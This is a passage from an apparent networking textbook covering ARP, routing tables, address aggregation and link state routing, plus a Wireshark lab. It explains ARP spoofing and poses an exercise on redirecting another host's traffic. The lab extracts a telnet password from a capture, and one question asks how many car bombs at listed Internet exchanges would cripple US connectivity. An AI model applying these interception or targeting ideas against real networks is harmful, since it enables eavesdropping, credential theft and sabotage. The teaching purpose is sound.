address N2? The reason is this: If User A needs to send data to User B, it will very often mean that User B will have to send data to User A soon thereafter. Most data exchanges are, after all, interactive. Thus, User B will likely need to know User A's IP addressEthernet address association. To save User B the trouble of having to send her own ARP request (for A's information) in the future, User A will include its IP-Ethernet address pairing in its request for B's information. Notice that all hosts on the network immediately learn IP address – Ethernet address association for User A. Thus all users make the following entry in their ARP cache: N1 : L1 Now, User B recognizes that the target IP address in the ARP Request is her IP address. Thus, it is User B's Ethernet address that is being requested. This, User B will craft an ARP Reply packet as shown below. L2 N2 L1 N1 L1 L2 To complete the story: After User A receives the ARP Reply from User B, User A will send the IP packet to User B by placing the IP packet in the data field of an Ethernet frame. 321 Practice Problem 14.4 In the protocol layering model of TCP/IP, how is a host identified: (a) At the Network Layer (b) At the Data Link Layer Solution: Practice Problem 14.5 What are the two types of messages used by the Address Resolution Protocol? Solution: Practice Problem 14.6 When a sender wants to find out what MAC address corresponds to an IP address, to which MAC address would she send an ARP request? (Circle the appropriate answer(s)) (a) 0.0.0.0 (b) ff:ff:ff:ff:ff:ff (c) 255.255.255.255 (d) 00:00:00:00:00:00 Solution: Practice Problem 14.7 Can an ARP Reply be sent without an ARP request? Solution: 5. ARP Spoofing A major flaw with ARP is that an ARP Reply message can be sent without a preceding ARP Request. To see what problems might ensue, consider again our local network, for which we now know User A and User B's IP address and Ethernet address pairing. We also indicate the IP address-Ethernet address pairing for User X, who is actually the Evil User! Suppose User X (Evil User) sends an ARP Reply that, for practical purposes, says: IP address N2 is paired with Ethernet address L3. Notice that this ARP Reply is not preceded by an ARP Request from any user. Nevertheless, all other users— trusting souls that they are—will update their ARP cache with the entry: N2 : L3 Note that this information pairing is not correct: the correct Ethernet address for User B (who has IP address N2) is L2, not L3. So…why would the Evil User have sent this bad gouge to all users on this local network, corrupting everyone's ARP cache? 322 He did this because he's EVIL! 24 Suppose User A now wants to send an IP packet to his friend (User B) with IP address N2. User A will check his ARP cache and see that the packet should be encapsulated in an Ethernet frame addressed to … L3 (Evil User). Thus the IP packet intended for User B will instead be routed to the Evil User. Sending an ARP Reply with an incorrect IP address–Ethernet address pairing with the intent to misdirect traffic is termed ARP spoofing. If an attacker with Ethernet address Attacker's Ethernet Address wants to steal traffic from a user with IP address Victim's IP address, he sends an ARP Reply saying: IP address Victim's IP address Attacker's Ethernet Address. is associated with Ethernet address Practice Problem 14.8 One of your crewmembers has downloaded ARP-spoofing software. (a) What does ARP spoofing software do? (b) What is one malevolent purpose he could use this for? Solution: II. Sending IP Packets to Users on Your Own Network If a destination IP address is in our same network, we directly deliver the IP packet. This is called, shockingly, direct delivery. In direct delivery, the destination is on the same network as the sender. No routers are involved as intermediaries. How does the sender know the destination is on the same network? The IP addresses of all machines on a single network will have the same network ID. So, the sender looks at the destination’s network ID. Thus, a host can easily see if another host is directly connected. How do we route to other hosts on the same network? Simple! The sender encapsulates the datagram in a data link frame, binds the destination IP address to a physical hardware address, and sends the resulting frame directly to the destination. Practice Problem 14.9 Your IP Address is 10.16.58.92/27. Can you use direct delivery to send messages to the host 10.16.58.129? Solution: Practice Problem 14.10 Your IP Address is 10.226.58.15/24. Could you use direct delivery to send messages to the host 10.226.58.229? Solution: 24 Note that an ARP reply when properly used is always sent to an individual user. Malicious ARP replies can be sent to the broadcast address. 323 III. Routing If the destination IP address is not in our same network (i.e., if it does not have the same network ID), we cannot directly deliver the IP packet. We must route the IP packet using routers: The source computer sends the IP packet to the first router, who passes the IP packet to the next router, and so forth, until the final router delivers the IP packet to the destination. Routers operate at the network layer; indeed, one of the key network layer functions is routing: choosing an appropriate path for packet flow. Forouzan, Data Communications and Networking, McGraw Hill, 2007 1. Routing Tables We route IP packets by using a routing table, which must (somehow) convey the route to the final destination. Each entity—host or router--maintains an IP routing table which provides information on how to reach possible destinations. A host or router consults a routing table when making routing decisions. Consider this naïve proposal for the use of a routing table: Maintain in each entity a routing table which lists every possible destination IP address, and the full path needed from the entity to reach each possible destination. In this scheme, a routing table might have billions of entries (since there might be billions of IP addresses in use at any time), and each of these entries would have multiple pieces of data associated with it (the full route to the destination for this entry in the table). This approach is not practical; the resulting routing tables would be gargantuan. Think of how slow routing would be if the decision on where to send each and every packet required consultation with a table of billions of entries. Moreover, think of the problem of constantly updating these huge tables as IP addresses are reassigned to different hosts throughout the Internet. So, early on, three clever ideas were employed to make routing tables as small as possible. First clever idea: For each destination IP address, only store in the routing table the IP address of the next hop. Consider the small network below which shows three networks interconnected with two routers: R1 and R2. Each of the three networks has many hosts connected to it, but, for simplicity, we only show two hosts: Host A and Host B. Figure 22.2 Route method versus next-hop method Let's consider the routing table for Host A, and, in particular, let's look at the entry for Host B. Originally, the entry for Host B would have been: This entry means: To reach Host B, send the packet to router R1, who will in turn send it to router R2, who will then send it to Host B. 324 2.2 Route method versus next-hop method The first clever idea recognizes that a host or router does not need to maintain information in its routing table about the full path to a destination. Host A's routing table entry for Host B can be reduced to: Router R1 will have its own routing table that will tell it that the next hop for destination Host B is router R2. R2 will have its own routing table that will tell it that the next hop for destination Host B is direct delivery to Host B. Second clever idea: Instead of having routing table entries for each and every destination host, store routing table entries for destination networks. Consider the network below which shows a portion of the routing table for Host A. Note that Host A has entries for Hosts B, C and D. Note that all three of these hosts (B, C and D) are on the same network (Network 2). All packets delivered to these three hosts will be delivered to the same network. Thus, we can collapse the three entries for B, C and D into a single entry in the routing table. All entities that connect to the same physical network share a common prefix (the network ID). Thus, routing tables only need to contain network prefixes, and not complete IP addresses. Thus routing decisions are made based on table lookup where routing tables keep only the network portion of the IP addresses (so the size of the routing table is, at worst, proportional to the number of networks, not the number of hosts). Third clever idea: Default Routing To avoid large routing tables, group multiple destinations into a single default case. That is, when we want to route a packet, we first check to see if the destination network ID is in the routing table; if not, send the packet to the default router. Consider Host A in the network below: 325 We see that Host A has a connection to Network 2 via router R1, and has a connection to the rest of the world via router R2. It would make sense for Host A to have an entry in its routing table for Network 2. But it would make no sense for Host A to have any entries for any other specific networks since any destination other than Network 2 will always be routed via router R2. So, by default, if the destination is not Network 2, we should send the packet to R2. Default routing is most useful when a host has a single connection to the Internet. Then routing is easy: If the destination's network ID does not match mine, send the packet to the default router. Summary .5 Simplified forwarding module in classless address So, let's summarize the decisions that are made in routing, and show the form of the routing table. Step 1. A packet shows up at a router X, needing to be routed to its final destination. Step 2. Router X examines the destination's IP address and extracts the network address. In order to extract the network address, the routing table for each network address must have the associated mask. So, a column for the mask is included as the first column in the routing table for Router X, shown below. .5 Simplified forwarding module in classless address So, Router X applies the mask in the first line of the table to the destination IP address: .5 Simplified forwarding module in classless address and checks to see if the extracted network ID matches the Network address shown on the first line: .5 Simplified forwarding module in classless address If it matches … Joy! … send the packet to the Next-hop address which is on this Interface: 326 If it does not match, repeat the process for the second line of the routing table. Practice Problem 14.11 Figure 22.6 Configuration for Example 22.1 (Based on an example in Forouzan, Data Communications and Networking, McGraw Hill) The router R1 in the figure below connects the four different networks shown. The four networks connect to the router’s four interfaces, labeled m0, m1, m2 and m3. 180.70.65.128/26 180.70.65.135/26 m3 (a) Why does the router R1 have 4 different IP addresses? Solution: (b) How would you verify that the router address 180.70.65.135/26 on the m0 interface is indeed on the network 180.70.65.128/26 ? Solution: (c) Your friend says: "Wait just a minute! The two different networks 180.70.65.128/26 and 180.70.65.192/26 look very similar. Are these really two different networks…i.e., are these really two nonoverlapping blocks of addresses?" How would you reply? Solution: (d) Construct the routingTable table. 22.11 22.1 Routing table for router R1 in Figure 22.6 327 We will see later that it is best to order the table by decreasing mask value…but let's proceed. (e) Suppose an IP packet with destination IP address 180.70.65.140 arrives at router R1. Explain how the routing table is used to make a routing decision. Solution: (f) Suppose an IP packet with destination IP address 201.4.22.35 arrives at router R1. What does it do? Solution: Figure 22.7 Address aggregation 2. Address Aggregation Consider the network below, examining also the routing table for router R2. From Forouzan, Data Communications and Networking, McGraw Hill, 2007 328 s aggregation R1 R1 R1 R1 m0 m0 m0 m1 Notice that the four addresses are disposed of in the same way: place on interface m0. Let's look at just the last octet of these four network addresses: 140.24.7.0 last octet: 0 0 0 0 0 0 0 0 140.24.7.64 last octet: 0 1 0 0 0 0 0 0 140.24.7.128 last octet: 1 0 0 0 0 0 0 0 140.24.7.192 last octet: 1 1 0 0 0 0 0 0 22.17 mask Note that the first two bits in this fourth octet are part of the mask (which is /26). But examine these two bits carefully! Any values of these two bits (00, 01, 10, 11) yield the same result: Send it out on interface m0. Since the values of these two bits do not need to be considered (since they can take on any of the four possibilities while yielding the same routing decision) we can move the mask up to /24 and consolidate these four entries on a single line: R1 329 Practice Problem 14.12 Given the following diagram: Use the technique of address aggregation to create the routing table for Router R2 with the minimum number of entries. Solution: 330 3. Longest Mask Matching Let’s consider now the following network previously referenced, where Organization 4 has split off while keeping its IP address block and is accessed now via router R3. ching ching ching ching 2.18 Router R2 has a routing table pictured below where Address Aggregation has been applied to the networks of Oraganization 1, Organization 2 and Organization 3, and are now listed under mask /24. R1 R3 Suppose a packet with destination address 140.24.7.200 arrives at router R2. (It is left as an exercise for the student to show that address 140.24.7.200 belongs to network 140.24.7.192/26.) What happens? By applying the mask listed in the routing table for R2, we see the IP packet is routed to the wrong location – to router R1. How can we fix this problem? k k matching matching To prevent this problem, routing tables are sorted from longest mask to shortest mask. This principle is called longest mask matching. So the corrected routing table for R2 would be: R3 R1 331 332 Problems 1. Given the following ARP table, make the necessary change(s) to cause all Ethernet traffic destined for 192.168.14.10 to flow to you (192.168.14.13) instead. IP 192.168.14.8 192.168.14.9 192.168.14.10 192.168.14.12 192.168.14.13 192.168.14.21 192.168.14.25 MAC AA:BB:CC:DD:EE:FF AA:BB:AA:BB:AA:BB CC:DD:CC:DD:CC:DD EE:FF: EE:FF:EE:FF A4:B5:C6:D7:E8:F9 C6:D7:C6:D7:C6:D7 E8:F9: E8:F9:E8:F9 2. Why is the destination hardware address field of an ARP request message filled with all zeroes? 3. Why is an ARP request message sent to the broadcast hardware address? 4. Combine these three blocks of addresses into a single block: 18.45.24.0/26 18.45.24.64/26 18.45.24.128/25 5. Construct the routing table for router RB in the picture shown below. 6. Suppose router RB in Problem 5 receives a packet with a destination address 3.3.3.38. Explain how the router uses its routing table to decide where to send this packet. 7. What feature of the Address Resolution Protocol makes it particularly vulnerable to a spoofing attack? 333 334 Security Exercise 14 Part I: The Geography of the Internet At this point you should appreciate that the Internet is, to a great extent, a large collection of routers along with the interconnecting media (copper wires, fiber optic cables, and, as we will see later in the course, wireless links). We have talked about the Internet (its routers, its interconnecting media) within the confines of the lecture notes and within the confines of mathematical algorithms. Which may leave you wondering: Where is the Internet physically? And what does it look like geographically? The original vision for the Internet was that it would be a small enterprise, and would be appear somewhat flat: each router would be just as important as any other router. The original intent was that the network would be fully distributed and decentralized so that it could survive a nuclear war. Stated another way, the original intent was that the Internet would have no routers serving as choke points that could serve as single points of failure. If—the theory went—every router is connected to the same number of other routers, then every router is equally unimportant to the survival of the Internet. So, with this vision in mind, we might expect the number of "routers per square mile" to be roughly the same. This is not how things turned out, to say the least. The Internet has, in fact, physical focal points—single buildings where a large number of routers are collocated—single buildings where a large amount of the Internet's traffic funnels through. To see how this came about, let's go waaaaaay back to 1980. A USNA grad was President, disco was dying out, and the Internet (then called the ARPANET) looked like this: In 1980 the listing of everyone on the Internet totaled 5000 names. These were names, not computers. The number of computers with Internet access was far fewer. In the mid-1980's the Internet (i.e., ARPANET) shifted to TCP/IP. In 1990 the ARPANET was retired and the Internet, as such, was then run by the National Science Foundation, and renamed NSFNET. The National Science Foundation decided that the NSFNET should only be accessed by lofty high-minded academics, and not by grungy businesses that are out to make a seedy profit by providing services to the unwashed masses. As a result of the National Science Foundation's Acceptable Use Policy, businesses found they were not permitted to connect to each other by using the NSFNET. What to do? What to do? Businesses decided to bypass the NSFNET and directly connect to each other! If Business A wanted to connect to Business B, the solution was to run a physical cable between a router in Business A's network to an intermediate router, and run a cable from a router in Business B's network to this same intermediate router. The only problem, then, was to find a location where one of Business A's routers and one of Business B's routers could be placed adjacent to this intermediate router. Once all three routers are collocated, running the two cables to connect Business A and Business B would be easy. Along came a company named MFS. MFS purchased a building, installed a very expensive (very capable) router and advertised itself as Metropolitan Area Exchange-East (MAE-East). MFS basically advertised: "Bring your router to MAE-East, and we will connect your router to our central router (thus connecting everyone's routers together)." The response to this advertisement was overwhelming: Companies showed up at MAE-East, Internet Service Providers showed up at MAE-East—basically, 335 anyone who wanted to interconnect to others showed up at MAE-East. By 1997, half of the Internet's traffic went through MAE-East. The surprising thing is that MAE-East is not a logical location that exists in theory. MAE-East is the fifth floor of 8100 Boone Boulevard in Tysons Corner Virginia (with equipment overflowing into an adjacent parking garage). The original notion of the Internet being geographically distributed and spread-out was over; there were now just a few chokepoints through which all the Internet's traffic passed. McDonald’s MAE-East 1997: 50% of Internet traffic goes through the fifth floor of this building. NSFNET eventually dissolved and sold off its components, and the Internet in turn evolved into a collection of independent networks—termed autonomous systems—all interconnected to each other through locations such as MAE-East. Today, in fact, the Internet is a collection of about 42,000 independent networks (again—autonomous systems is the proper term), interconnected to each other. But we are getting a little ahead of ourselves—let's go back to the 1990's! In the late 1990's, organizations decided that it was technologically better to directly connect their autonomous systems to each other without a middleman router (such as that provided in MAE-East). Digital Equipment Corporation purchased a building at 529 Bryant Street in Palo Alto California, christened it the Palo Alto Internet Exchange (PAIX) and advertised: "Bring a router connected to your autonomous system to 529 Bryant Street, and we will directly connect it to other autonomous systems in our building." By 2000, PAIX was the Internet's main connectivity hub. 529 Bryant Street? What's that you ask? That would be this nondescript building: 336 Gee. What a nice building. I wonder what goes on inside? Surprisingly, even today this unremarkable building remains one of the Internet's most critical locations, one of the few major key connectivity nodes. Another key focal point, where various autonomous systems are connected together is MAE-West at 55 Market Street in San Jose. By some estimates, a third of the nation's Internet traffic goes through this single building: The surprising point bears emphasizing: There exists a discrete set of geographic locations through which a large percentage of the Internet's traffic is funneled. More examples: Almost all Internet traffic Between North and South America travels through a building at address 50 N.E, Ninth Street, Miami, FL. You might be happy to know that in recent years the Internet has moved back to the East coast! One of the main Internet focal points today is the Equinix campus in Ashburn Virginia near Dulles Airport: While it is true that the Internet of today is decentralized in terms of control (no one independent autonomous system is able to control another independent autonomous system), it is decidedly not decentralized in terms of geography. There are, in fact, many geographic choke points of great connectivity. 337 In summary, today there are approximately 42,000 autonomous systems (networks) connected together to form the Internet. The locations where these autonomous systems are connected together (those beautiful buildings we have shown pictures of) are termed Internet Exchanges. These Internet Exchanges allow networks to connect directly to each other. The street addresses for these Internet Exchanges are readily accessible. See, for example, the Internet Exchange map published by TeleGeography located here: http://www.internetexchangemap.com/ Question 1: How many Internet exchanges are within 100 miles of Washington, D.C.? Question 2: What is the address for the Internet Exchange located in Milwaukee? Journalist Andrew Blum describes a visit he made to this building (the address you gave in your answer to Question 2) with a colleague named Jon Auer in 2011: A sleepy-eyed guard sat listlessly behind a worn-out desk in the empty lobby. Auer nodded in her direction and led us down a narrow tiled passageway to the basement... Auer pointed to a steel box tucked into a dark corner, its LED lights blinking away. This was the main access point for Milwaukee's municipal data network, connecting libraries, schools and government offices. "All this talk about Homeland Security, but look what someone could do in here with a chainsaw". Question 3: There are 68 Internet exchanges in the United States. If you had a small terrorist army and wanted to cripple the United States by obliterating it's Internet connectivity, how many well-placed car bombs would you need (to the nearest 100)? There must be some other reason why we showed you pictures of those pretty buildings, right? Well, besides being critical security weak spots, these buildings became very popular locations for small NSA field offices following the attacks on September 11, 2001. In his bestseller The Shadow Factory, James Bramford details how the NSA went to these various Internet Exchanges in the United States, and installed taps at the main interconnections. In this way, the NSA was able to monitor what amounted to, roughly, ALL Internet traffic. Question 4: If you worked for the NSA and wanted to install taps on the Internet to monitor all Internet traffic, how many locations would you need to visit (to the nearest hundred)? The issues involving the invasion of privacy suffered by everyday Americans through the NSA's tapping of traffic at the Internet Exchanges remains controversial to this day. Part II: Your NSA Internship! CONGRATULATIONS! You have been selected for a summer NSA internship! How exciting! You are now meeting your new boss! Well hello there! Welcome aboard! I'm Eric. What is your name? I'm sorry… what did you say your first name was? Ok… welcome aboard, Midshipman! Your boss Eric tells you that the NSA suspects a midshipman living in Bancroft Hall (where else?) is allied with a terrorist group. The midshipman's last name is Roy and the NSA has been tapping into his Internet traffic for some time through a tap at MAE-East. You will be asked to analyze several captures of MIDN Roy's traffic using the Wireshark program. In fact, you are given three tasks. Again, it is difficult to contain the excitement, and we again congratulate you. Task 1: Capturing a password Eric tells you that the first capture of MIDN Roy’s Internet traffic is located in the file telnetdata.pcap. The NSA suspects that this packet capture contains MIDN Roy’s use of a Telnet session. Telnet is a networking protocol that provides communication to a remote server. Many Telnet servers require the user to enter a username and password to access the service, and the NSA is hoping you can extract MIDN Roy’s username and password from the file. The NSA suspects that MIDN Roy is using the IP address 192.168.1.7. 338 Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting: Applications > Internet > Wireshark (as root) Under File, Click Open and highlight the file named telnetdata.pcap as shown below And then hit Open. Recall that MIDN Roy has the IP address 192.168.1.7. The very first packet (Packet 1) is a DNS request. Recall that DNS is used to determine the IP address for a given URL. In other words, if we give DNS a website address such as www.foxnews.com , DNS will tell us that the IP address is 23.15.7.144. So, in the very first line of the capture (we will call this "packet 1" although, technically, this is not a packet…it's a packet inside an Ethernet frame) we see that MIDN Roy is trying to find the IP address for a website. What website might this be? Look in the Info field of Line 1 in the Packet List pane, and look at the Domain Name System Query information in the middle pane (the Packet Details pane). Question 5. What website is MIDN Roy attempting to find the IP address for? Packet 2 is the DNS reply to the DNS request in packet 1. Question 6. What is the IP address that corresponds to the website that MIDN Roy is accessing? MIDN Roy is attempting to establish a telnet session with the server located at the IP address you provided in Question 6 above. Let's focus on just the telnet packets by entering telnet in the filter field as shown below and then hitting Enter: 339 Now, we are attempting to determine the username and password that MIDN Roy entered in order to logon to the remote server. So, we wish to concentrate only on the packets that have MIDN Roy’s IP address (192.168.1.7) as a source. Click the Source field to order the packets by IP address: You should now see this: Notice the packets are no longer in sequence, the first packet listed is packet 7… this is the first TELNET packet send by MIDN Ban. 340 To examine the Telnet data, concentrate on the middle pane (the Packet Details Pane) and click the arrow next to Telnet for the first listed packet (which is packet number 7). You should see: So, you notice that for the very first Telnet packet sent from MIDN Ban, he is telling the remote server to please echo back (Do Echo) what he types, so that he sees it on his screen as he is typing. For information (although it does not apply to this particular packet), \r is the escape sequence for carriage return back to the beginning of the same line and \r\n moves us to the beginning of the next line. (Some Unix variants interpret \n as a line feed without a carriage return; hence we often will use "Carriage Return Line Feed" as \r\n). Examine the Telnet data for each of these packets. Question 7: What username is MIDN Roy using? Question 8: What password is MIDN Roy using? So, you know the password that MIDN Roy uses for this one specific site. But…check out this recent short news item: http://www.reuters.com/article/2014/08/05/us-cybercrime-breach-russia-idUSKBN0G52HS20140805 Question 9: What use might it be to know MIDN Roy’s password for this one specific site? 341 Task 2: Capturing a search term Eric has just returned from the Bolshoi Ballet and he is very proud of your work in Task 1. He has now given you a second packet capture obtained by snooping on MIDN Ban. This second packet capture is located in the file secondcapture.pcap. In Wireshark, close the file you were working on, and open the file secondcapture.pcap. Clear the Filter if you see that it is still set to telnet. Question 10. How many packets are in this capture? You are told: "Analyze this packet capture." What do you do? So many packets. So little time. You know from the prior packet analysis that the user has IP address 192.168.1.7, so you hit the Source IP address field to order the packets by IP address: Question 11. Is MIDN Roy’s old IP address (192.168.1.7) listed? You ask a fellow intern what to do, and he says that he heard that it is sometimes a good idea to see all the conversations that have gone on in the packet capture. Let's select Statistics => Conversation List => IPv4 as shown below: 342 Question 12. Is How many separate conversations are taking place in this packet capture? So… which of these IP addresses correspond to MIDN Ban? To answer this, look at the third column that says Packets. This lists how many packets have been sent between the two endpoints for that line. For example, in the picture below, we see that 2 packets were sent between IP addresses 10.52.49.232 and 224.0.0.1. So… if this is indeed a packet capture from MIDN Ban, then it stands to reason that MIDN Roy should have been doing the most talking…i.e., sending or receiving the most packets. So… focusing on the conversations that involved the most packets (the bottom of the list), we should be able to determine MIDN Roy’s IP address. Question 13. What would be your guess about MIDN Roy’s IP address? Question 14. Given your answer above (MIDN Roy’s IP address), which IP address does MIDN Roy seem to be communicating with the most? Verify your answers to Questions 13 and 14 with your instructor or lab tech before proceeding! So… who owns this IP address that MIDN Roy is communicating with? Glad you asked! IP addresses in North America and Canada are assigned by the American Registry for Internet Numbers. Let's go to their website: https://www.arin.net/ and, in the Search Whois box at the upper-right (see picture below for the location), enter the IP address that MIDN Roy is communicating with (which was your answer to Question 14): 343 Question 15. Who owns this IP address? Does this corporation sound familiar? Go to the Wikipedia page for Wikipedia (i.e., go to Wikipedia, and then enter the search term "Wikipedia"). Review the summary shown on the right sidebar of the webpage. Question 16. Who owns Wikipedia? Question 17. To summarize, in this packet capture that you are examining, where is MIDN Roy spending most of his time? So, let's focus on the packets that are sent from MIDN Roy to this particular website. Let's click on the Destination header: and then scroll down to the first packet that is from MIDN Roy to this IP address we are interested in. You recall from SI110 that webpages are retrieved using the GET command. Let's focus just on the packets that are from MIDN Ban, to the website of interest, that use the GET command (which, if used, will appear as the word GET in the Info field. Question 18. How many packets do you need to focus on—How many packets have MIDN Roy’s IP address as the Source, have the target's IP address as the Destination, and have the word GET appearing as the first item in the Info field? Question 19. Okay, time to put all your cyber skills to use! What are the two terms that MIDN Roy searched for on Wikipedia? Hint: Look for "search=" somewhere in the string following the word GET in the Info field. 344 Task 3: Capturing browsing history Eric has just returned from lunch with the Russian ambassador and he is thrilled with the work you have done. He has given you a third packet capture from MIDN Roy and has asked you to analyze the capture to determine the websites where MIDN Roy has been spending his time. You are given a packet capture named webtraffic.pcap. Your goal is to determine three distinct websites that MIDN Roy has visited. In Wireshark, close the file you were working on, and open the file webtraffic.pcap. Click on the No field (i.e., the leftmost field) if necessary so that the first packet listed is Packet 1. Question 20. What is the time duration of this packet capture? Question 21. How many total packets were captured? Select Statistics => Summary. Question 22. How many total bytes are in this packet capture? Question 23. On average, how many bytes per second were captured? This is just a packet capture from one midshipmen! Question 24. Let's say there are 1 billion people on line. If they generate traffic at approximately the same rate as MIDN Ban, what is the total Internet traffic generated (in bytes) per second? Question 25. Using this value, how many bytes of Internet traffic are generated per day? Note that the printed collection of the U.S. Library of Congress is estimated to be 11013 bytes. Question 26. If the NSA is vacuuming up all of the Internet's data, can the data actually be used… or is there simply too much data for anyone, even the NSA, to make sense of? Question 27. Looking at the TCP Conversations Statistics => Conversation List => IPv4 , guess MIDN Roy’s IP address. Verify your answer to Questions 27 with your instructor or lab tech before proceeding! Since we want to determine the websites that MIDN Roy has visited, let's filter our display so that it shows only http packets by entering http in the filter. Now, click the Source header to group IP addresses together, and scroll down to where MIDN Roy’s packets start. Now, here is what you need to do: You need to search through the GET packets to find the websites that MIDN Roy browses. You might be saying: "AGHHH… that's a lot of GET commands"! But… it's not so bad. Click on the very first GET packet from MIDN Ban. If you examine the GET info for this command you will see: 345 We see that this host he is contacting is www.bbc.com! This provides a very good clue that one of the websites that MIDN Roy is visiting is www.bbc.com. There, you have found one of the three websites MIDN Roy visited. Now click the second and third GET packets. You should see that these are also from www.bbc.com. Question 28. What are the other two sites that MIDN Roy visited in this packet capture? Note that the HTTP GET / HTTP/1.1 provides a good indication of an initial request to a website. Much of the traffic that follows are assorted advertisements, tracking and monitoring sites, and related sites (e.g.: "Follow us on Facebook") 346 Security Exercise 14 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: Question 13: Question 14: Question 15: 347 Question 16: Question 17: Question 18: Question 19: Question 20: Question 21: Question 22: Question 23: Question 24: Question 25: Question 26: Question 27: Question 28: 348 Chapter 15: Routing Part II Objectives: (a) Describe the fundamental algorithms used to construct routing tables. (b) Describe how a routing table is developed using link state routing. (c) Describe how a routing table is developed using distance vector routing. (d) Identify the relative advantages and disadvantages of link state routing and distance vector routing. In the previous lecture we used routing tables that already existed. Armed with the knowledge of how to use routing tables, in this lecture we discuss where those routing tables actually come from (i.e., how they are derived). Up until this point we have talked about simple examples where one router is the only path to one network. In reality, things are much different. Often there can be multiple paths from one network to another. The question is not just how to get from Point A to Point B, but how to get there using a good route. I. What is a Good Route? 1. Routing Algorithms. A routing algorithm tells a router which outgoing line an incoming packet should be placed on. For IP packets, the routing decision is made from scratch for each packet that arrives. A routing algorithm should endeavor to satisfy the following attributes: Correctness—packets should be routed to the proper destination. Simplicity—algorithms should clean and simple so that packets are routed quickly to their destinations. Unwieldy Rube Goldberg-type algorithms are to be avoided. Robustness—algorithms should adapt to changes in the network's topology caused by router or link failures. Stability—the algorithm should converge to a specific solution; packets should not be left aimlessly circulating in loops around the network. Optimality—if there are multiple ways to get from Point A to Point B, the algorithm should provide the optimal path through the network. Routing is accomplished by routing protocols which establish routing tables in each router. The router consults its table to determine how to route packets. 2. Networks as Graphs. To develop routing algorithms we model a computer network as a graph: the nodes of the graph are the routers. An edge in a graph represents a communication link between two routers. On each edge between two routers, we assign a weight. This weight might be distance, cost, queuing delay, or some other factor of interest. Our problem: Find the path from a given source node to a destination node which minimizes the total weight. If our weights represent: then we are interested in: distance shortest path cost cheapest path queuing delay fastest path 3. Routing with Partial Information Routing is somewhat complicated by the fact that decisions are based on partial information. But we encounter such situations every day. Consider driving down a road: Not every road sign lists every destination. But, usually there is a default! (In road travel, the default is: If your destination is not listed on the sign, keep driving straight.) When taken as a whole, routing tables (like road signs) must be consistent and complete. It is important that: all explicit directions correctly point to a shortest path all shortest paths for all destinations be explicitly noted in the tables Note that routers make local routing decisions – i.e., they decide the next place to send a packet addressed to a specific destination. But they must make this decision based on some understanding of the global network picture. So, each router 349 needs global information about the network. It is somewhat confusing, so the point bears repeating: Routers make local routing decisions based on global information. Recall that routing protocols establish routing tables in each router, and, as a simplification, we can say that these tables have the following format: Destination address Address of the next element on the best path to the destination When a packet shows up at a router, the router refers to the routing table to decide where to send the packet. To get an idea of what a routing table should look like for a larger network than those we have treated up to this point, consider the network shown below on the left. Suppose the weight of each link is one. The question is: What should the routing table be for Router 1? The answer to this question is shown on the right. 8 7 Routing Table for Router 1: 1 3 destination 2 3 4 5 6 7 8 9 10 5 9 2 4 10 6 next hop 2 3 2 3 3 3 3 3 2 Practice Problem 15.1 Consider the network shown below, where the numbers on the edges indicate the cost of using that edge. For example, the cost of using the link from Router A to Router B is 1, whereas the cost of using the link from Router A to Router D is 4. (a) Fill in the routing table for Router A, and include the total cost. B C 3 1 2 A 1 4 4 1 D E Solution: Destination B C D E F F 1 Next Hop Total Cost 350 (b) If all routers have the correct routing tables, what is the path that an IP packet travels from Node A to Node F? (Note that to state a path, you just need to state the sequence of routers encountered along the path; for example, one possible path from Router A to Router F is A-D-E-F. Solution: (c) What is the total cost of the path you selected in Part (b) above? Solution: II. Routing Protocols So, now that we know what routing tables should look like, we ask the question: How do routing tables actually get put together? You likely solved the preceding example by looking down on the network and performing a visual analysis of the picture. Routers do not have the ability to hover over a picture of the network, and they do not have human visual skills at their disposal for use in analyzing a diagram. Routers use routing protocols to build their routing tables. Routing protocols are intended to: Communicate network topology information to each router. Determine how individual routers will use this information to make routing decisions (i.e., determine how individual routers will use this information to construct routing tables like the one shown above). We will discuss two routing methodologies: Link State Routing and Distance Vector Routing. 1. Link State Routing A. Two key ideas: Each router learns the full network topology. That is, each router learns a complete picture of the network graph– the routers, the links and the link weights. Knowing the complete network picture, each router independently computes the optimal routes to each destination and constructs a routing table. B. Learning the topology. The first bullet above says “routers learn the full network topology.” So, in link state routing, how do routers come to know the network topology? Here's how: Each router learns its neighbors’ addresses by sending "Hello" packets to which its neighbors reply. Each router determines the weight of each of its links. For example, if these weights represent time delays, the routers might determine how long it takes to receive a reply, and use that as the weight. If the weight is a cost, the router might “know” the costs associated with each link based on data entered by a network administrator. Each router then transmits packets that tell information about that individual router's links. For instance, in the picture below, Router 26 sends a packet that essentially says: My name is Router 26 18 Router 18 is connected to me and the weight of the edge joining us is 4 4 Router 35 is connected to me and the weight of the edge joining us is 2 26 Router 51 is connected to me and the weight of the edge joining us is 3 3 2 35 51 351 Or, somewhat more formally, it transmits a packet that conveys the following table. 26 Router Weight 18 4 35 2 51 3 By sending this packet, a router informs the network about the status, or state, of each of its links. Hence, this methodology is called Link State Routing and these packets are called Link State Packets (LSPs). This info will then be used by others to construct routing tables. These LSPs are distributed to all other routers using "controlled flooding": When a router receives a LSP, it gives it to all of its neighbors. A router keeps track of which LSPs it has seen, and only floods them the first time they arrive. Now…think about this: After each router has sent its LSP, and after each LSP has circulated to all the other routers, then does each router have a full and complete picture of the network topology? The answer is Yes! But what then—we still don't have routing tables in each router? The answer: Each router determines the shortest path (i.e., the path with the lowest total weight) from itself to every other node in the network by running a famous algorithm named "Dijkstra's Algorithm". This relatively easy algorithm is covered in any Discrete Math textbook, but will not be covered in EC310. See the box below for more information about Dijkstra's Algorithm It is important that the fundamental idea be understood: In link state routing: Each router, in its LSP, sends information about its neighbors only. The information in this LSP is sent to all other routers. An Aside Do routers really have names like 'Router 26'? Yes! In the Internet's OSPF routing protocol, a router identifies itself to all other routers using a unique IP address called a Router ID. Additionally, in every OSPF message a router sends it will include its Router ID so that other routers know who originated the message and where they can be reached. For this reason it is very important that the IP address assigned as the Router ID is always available. As you know, hardware (like your trusty drill rifle) is prone to failure. Therefore, a special software interface called the loopback interface is assigned the Router ID. The loopback interface, because it is enabled in software, is always active regardless if one or two hardware interfaces on a router stop working. This ensures routers can always find each other to communicate when needed. What are the routers talking about with each other and why do they need to communicate so often? There are a number of internal measures routers use in order increase efficiency and prevent unnecessary information from clogging up the network, such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSU). To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt. 352 